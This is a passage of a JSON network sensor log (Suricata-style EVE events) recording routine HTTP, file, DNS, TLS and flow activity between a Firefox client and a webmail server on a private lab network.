Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} {"timestamp":"2020-02-29T00:27:19.462861+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":0}} {"timestamp":"2020-02-29T00:27:19.464307+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered-inv.png","state":"CLOSED","stored":false,"size":138,"tx_id":0}} {"timestamp":"2020-02-29T00:27:19.464428+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192}} {"timestamp":"2020-02-29T00:27:19.465999+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248}} {"timestamp":"2020-02-29T00:27:19.465837+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":192},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal-inv.png","state":"CLOSED","stored":false,"size":192,"tx_id":1}} {"timestamp":"2020-02-29T00:27:19.467776+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reply.png","state":"CLOSED","stored":false,"size":248,"tx_id":1}} {"timestamp":"2020-02-29T00:27:19.479778+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253}} {"timestamp":"2020-02-29T00:27:19.480640+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:27:19.481302+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete.png","state":"CLOSED","stored":false,"size":312,"tx_id":2}} {"timestamp":"2020-02-29T00:27:19.481869+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737}} {"timestamp":"2020-02-29T00:27:19.489678+0000","flow_id":947000290277582,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39733,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41386,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:19.522783+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/forward.png","state":"CLOSED","stored":false,"size":253,"tx_id":2}} {"timestamp":"2020-02-29T00:27:19.598174+0000","flow_id":947000290277582,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39733,"proto":"UDP","dns":{"type":"answer","id":41386,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:19.598174+0000","flow_id":947000290277582,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39733,"proto":"UDP","dns":{"type":"answer","id":41386,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:19.672819+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1843}} {"timestamp":"2020-02-29T00:27:19.672819+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1843},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":244,"tx_id":3}} {"timestamp":"2020-02-29T00:27:19.693191+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1843},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":4807,"tx_id":3}} {"timestamp":"2020-02-29T00:27:19.695078+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1737},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":1737,"tx_id":3}} {"timestamp":"2020-02-29T00:27:19.695774+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:27:19.696292+0000","flow_id":1068792677898677,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53184,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297}} {"timestamp":"2020-02-29T00:27:19.697768+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","state":"CLOSED","stored":false,"size":234,"tx_id":4}} {"timestamp":"2020-02-29T00:27:19.741338+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:27:19.741554+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485}} {"timestamp":"2020-02-29T00:27:23.000176+0000","event_type":"stats","stats":{"uptime":15295,"capture":{"kernel_packets":142546,"kernel_drops":0},"decoder":{"pkts":142586,"bytes":97913480,"invalid":196,"ipv4":140985,"ipv6":10,"ethernet":142586,"raw":0,"null":0,"sll":0,"tcp":135382,"udp":5392,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7090144},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2929,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2945,"synack":2936,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1932,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2467,"failed_udp":116},"tx":{"http":5076,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2551}},"flow_mgr":{"closed_pruned":2900,"new_pruned":17,"est_pruned":2551,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":11220,"memcap_state":0,"memcap_global":0},"http":{"memuse":105176,"memcap":0}}} {"timestamp":"2020-02-29T00:27:23.186394+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/plus.png","state":"CLOSED","stored":false,"size":485,"tx_id":4}} {"timestamp":"2020-02-29T00:27:23.186770+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316}} {"timestamp":"2020-02-29T00:27:23.188334+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53182,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/print.png","state":"CLOSED","stored":false,"size":349,"tx_id":5}} {"timestamp":"2020-02-29T00:27:23.188587+0000","flow_id":838144344192643,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53182,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:27:24.178077+0000","flow_id":1770852327399578,"in_iface":"eth0","event_type":"tls","src_ip":"192.168.10.130","src_port":34308,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","tls":{"subject":"CN=mail.spiral.com","issuerdn":"CN=ChangeMe","fingerprint":"4a:cf:f5:f8:ce:55:c7:45:08:c5:21:a0:2d:b6:f5:0f:3c:e0:a3:17","sni":"mail.spiral.com","version":"TLS 1.2","notbefore":"2020-02-28T18:40:24","notafter":"2030-02-25T18:40:24"}} {"timestamp":"2020-02-29T00:27:24.701651+0000","flow_id":1068792677898677,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53184,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/download.png","state":"CLOSED","stored":false,"size":297,"tx_id":0}} {"timestamp":"2020-02-29T00:27:26.000229+0000","flow_id":1691541457050508,"event_type":"flow","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":35,"pkts_toclient":56,"bytes_toserver":8649,"bytes_toclient":66438,"start":"2020-02-29T00:26:19.957324+0000","end":"2020-02-29T00:26:25.439540+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.000477+0000","flow_id":1289824575955109,"event_type":"flow","src_ip":"192.168.10.81","src_port":53152,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:26:20.008357+0000","end":"2020-02-29T00:26:25.160374+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.000669+0000","flow_id":1460171568849225,"event_type":"flow","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1862,"bytes_toclient":1979,"start":"2020-02-29T00:26:20.008521+0000","end":"2020-02-29T00:26:25.089944+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.000890+0000","flow_id":371298575065439,"event_type":"flow","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":30,"bytes_toserver":5040,"bytes_toclient":31417,"start":"2020-02-29T00:26:20.008543+0000","end":"2020-02-29T00:26:25.702106+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.001002+0000","flow_id":1225885397469246,"event_type":"flow","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":83,"pkts_toclient":121,"bytes_toserver":13296,"bytes_toclient":151458,"start":"2020-02-29T00:26:14.837694+0000","end":"2020-02-29T00:26:25.698980+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.001137+0000","flow_id":1673743112610025,"event_type":"flow","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1906,"bytes_toclient":2538,"start":"2020-02-29T00:26:20.008425+0000","end":"2020-02-29T00:26:25.432430+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:27:26.800225+0000","flow_id":571491300029921,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46613,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46428,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:26.826777+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/newwin.png","state":"CLOSED","stored":false,"size":316,"tx_id":5}} {"timestamp":"2020-02-29T00:27:26.908921+0000","flow_id":571491300029921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46613,"proto":"UDP","dns":{"type":"answer","id":46428,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:26.908921+0000","flow_id":571491300029921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46613,"proto":"UDP","dns":{"type":"answer","id":46428,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:27:26.991245+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6769}} {"timestamp":"2020-02-29T00:27:27.089615+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6769},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":23886,"tx_id":6}} {"timestamp":"2020-02-29T00:27:27.091932+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53180,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622}} {"timestamp":"2020-02-29T00:27:27.094641+0000","flow_id":114549728997166,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53180,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=o5uC2xrWPkp9v4vMckisGCF&uniq=1582936046497","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/message-dimp.js","state":"CLOSED","stored":false,"size":10354,"tx_id":7}} 